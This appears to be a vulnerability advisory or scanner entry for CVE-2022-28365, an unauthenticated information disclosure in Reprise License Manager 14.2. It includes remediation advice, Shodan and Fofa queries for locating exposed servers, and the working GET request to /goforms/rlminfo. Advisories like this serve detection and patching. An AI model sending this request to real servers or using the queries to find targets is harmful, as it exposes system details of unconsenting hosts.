| Title | Reprise License Manager 14.2 - Information Disclosure |
|---|---|
| Author | Akincibor |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to gain sensitive information. |
| Remediation | Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. |
| CVSS Score | 5.3 |
| EPSS Score | 0.40631 |
| CVE ID | CVE-2022-28365 |
| CWE ID | CWE-425 |
| Shodan Query | http.html:"reprise license"http.html:"reprise license manager" |
| Fofa Query | body="reprise license manager"body="reprise license" |
| Tags | cve cve2022 rlm packetstorm exposure reprisesoftware vkev vuln |
Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.
GET /goforms/rlminfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28365.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-28365.pcap
N/AN/A